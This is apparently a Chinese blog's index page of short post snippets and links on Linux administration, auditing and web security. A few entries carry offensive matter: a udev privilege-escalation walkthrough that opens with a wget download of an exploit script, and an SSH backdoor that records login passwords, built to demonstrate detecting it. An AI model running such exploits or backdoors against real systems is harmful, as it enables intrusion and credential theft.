cnbird_个人页

Grep与web漏洞挖掘

Grep与web漏洞挖掘 文/SuperHei_[At]_ph4nt0m.org   2006-03-08 [a.

二进制代码审核

http://hi.baidu.com/linx2008/blog/item/869f3f6d0133b8f342169426.

Linux Network Tuning

(以前写的,当时用的RH Linux AS5.) 如下网络配置参数调整,主要是针对请求压力大的Linux (2.

squid缓存策略

http://hi.baidu.com/%CA%AB%D5%B9/blog/item/fa76860aec9d993eb0351d59.

使用低权限 Oracle 数据库账户得到 OS 访问权限

http://huaidan.org/archives/3154.html

oracle更改默认端口号，监听器加密，限制ip访问---

http://www.cnblogs.com/skl99/archive/2009/02/06/1385057.

行业标准文件

http://www.hztec.org.cn/policy/index1.html

Red Hat Linux EL 的补丁部署工具

satellite server

WSUS全攻略之三：WSUS操作指南

http://winsvr.org/info/info.php?sessid=&infoid=21

Linux安全问题

http://www.zzbaike.com/wiki/Linux%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98 http://www.

局域网内WSUS服务器的安装与使用经验

http://www.51cto.com/art/200611/35373.htm

腾讯2009安全技术峰会

http://tech.qq.com/zt/2009/informations/

运维小技巧

在运营网站的过程中，可能会遇到网站突然变慢的问题，一般情况下和 MySQL 慢有关系，可以通过开启慢查询，找到影响效率的 SQL ，然后采取相应的措施。

用strace找ssh后门

首先我先编译一个ssh后门，这个ssh后门会在/tmp/xxxxxx记录所有的登录密码 启动他QUOTE: root@laptop:/usr/local/openssh2/sbin# ps aux | grep sshd root     13619  0.

hydra 安装

It´s quite easy to install THC-HYDRA 5.4 with Ubuntu 9.

Astalavista被蹂躏过程(转载自baoz.net)

里面两个亮点，一是远程获得apache用户权限的shell，banner是LiteSpeed，看来这玩意有0day，但是又怎么是用 apache用户跑的，原来LiteSpeed这东西是和apache绑一起的，大概看了下介绍，主要功能是anti-ddos，这东西貌似还有点意思， 回头玩玩。

udev漏洞提权过程

1）下载攻击脚本： wget http://www.extmail .org/source/exploit-udev-8478 2）获得udev进程号 执行：ps ax|grep udev|...

LINUX用户登录后精确命令记录

主要功能： 　　可以记录哪个ip和时间(精确到秒)作了哪些命令 　　通过用户登录时候，重新定义HISTFILE 　　HISTFILE文件名包含登录用户名，ip,登录时间(精确到秒)等 　　这...

Google 推出 Open Source 的安全工具：RatProxy

最近 Google 推出一套免費的 Web 安全評估工具，叫做 ratproxy，這套工具可以檢測、分析您的網站是否有安全性漏洞或網頁是否有被入侵，目前可支援 Linux, FreeBSD, MacOS X, 與 Windows (Cygwin) 等執行環境（反正就是 Unix-like 的環境啦）。

使用Inotify 监控Linux 文件系统事件

http://www.souzz.net/html/server/Linux/15719.html

Linux系统整体性能监控工具详解

http://www.bitscn.com/linux/technic/200802/128193.

免费网络管理流量监控软件大比拼

http://20194.blog.51cto.com/10194/11862

企业安全流程

http://articles.e-works.net.cn/Security/Article54272.

风险评估教程

风险评估中的渗透测试

http://blog.ixpub.net/html/46/1772146-403025.html

SELinux实例：使用安全增强的Linux

http://www.51cto.com/art/200810/94193.htm

审计跟踪Linux的异常活动

一些异常用户试图移去系统上的所有活动记录(比如 ~/.bash_history), 不过我们可以使用专门的工具来监视所有用户执行的命令.

根据IP分别审计Linux远程用户历史命令

往.bashrc里加行HISTFILE=.bash_history_$(w | grep `ps|grep ps|awk '{print $2}'`|awk '{print $3}') 让每个IP来的.

Php Code Audits的方向

http://hi.baidu.com/hi_heige/blog/item/2ac6ab003fea1105738da5a3.

职业欠钱兄发的宝贵的帖子

http://bbs.cisps.org/viewtopic.php?p=119541 http://topoint.

Linux系统防火墙防止DOS和DDOS攻击

http://www.xgdown.com/article/53/141832_1.htm Linux系统防火墙防止DOS和DDOS攻击(1) 用Linux 系统防火墙功能抵御网络攻击     虚拟主机服务商在运营过程中可能会受到黑客攻击，常见的攻击方式有SYN ，DDOS等。

在线SSH控制端--Online SSH AJAX client

http://www.serfish.com/console/

PHP <= 5.2.9 Local Safemod Bypass Exploit (win32)

Abysssec Inc Public Advisory Title : PHP

Lighttpd < 1.4.23 Source Code Disclosure Vulnerability (BSD/Solaris bug)

Severe vulnerability due to a bug in FreeBSD, OS X and Solaris (

SSHatter SSH Brute Forcer

SSHatter is an SSH brute force utility available from http://freshmeat.

自已动手快速修理鼠标按键失灵(失控)故障

http://www.mydigit.cn/?dp-bbsthread-57216.html

Mobius Forensic Toolkit

Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and cas...

测谎招数

（来源该剧 仅供娱乐） 　　1.撒谎者不像惯常理解的那样会回避对方的眼神，反而更需要用眼神交流来判断对方是否相信他说的话。

XSS视频

http://www.boobooke.com/v/bbk2337/

Javascript的调试利器：Firebug使用详解

http://blog.csdn.net/tianxiaode/archive/2007/09/02/1769152.

xss工具

http://huaidan.org/archives/769.html http://www.

Marathon Tool

 http://www.codeplex.com/marathontool

Defcon Media Archives

http://www.defcon.org/html/links/defcon-media-archives.html

sqlinjectionfinder

http://www.codeplex.com/WSUS/Release/ProjectReleases.

bill Ajax Security

 http://www.youtube.com/watch?v=hKrvY42dw1A&eurl=http%3A%2F%2Fhuaidan%2Eorg%2Farchives%2F2259%2E...

javascript 变形工具集

http://ftp.andrew.cmu.edu/pub/mpack/ http://www.

美國駭客年會 Black Hat 2008 觀察--第二天

http://huaidan.org/archives/2259.html

Using a hacked Wordpress site to pwn the web server

http://blog.banditdefense.com/2009/03/09/using-a-hacked-wordpress-site-to-pwn-the-web-server/ ...

Video: Making money on the Web the black hat way

http://www.youtube.com/watch?v=SIMF8bp5-qg&eurl=http%3A%2F%2Fwww%2Enet%2Dsecurity%2Eorg%2Fsecwor...

epicwebhoneypot

http://sourceforge.net/projects/epicwebhoneypot The Epic Web Honeypot Project aims to lure attac...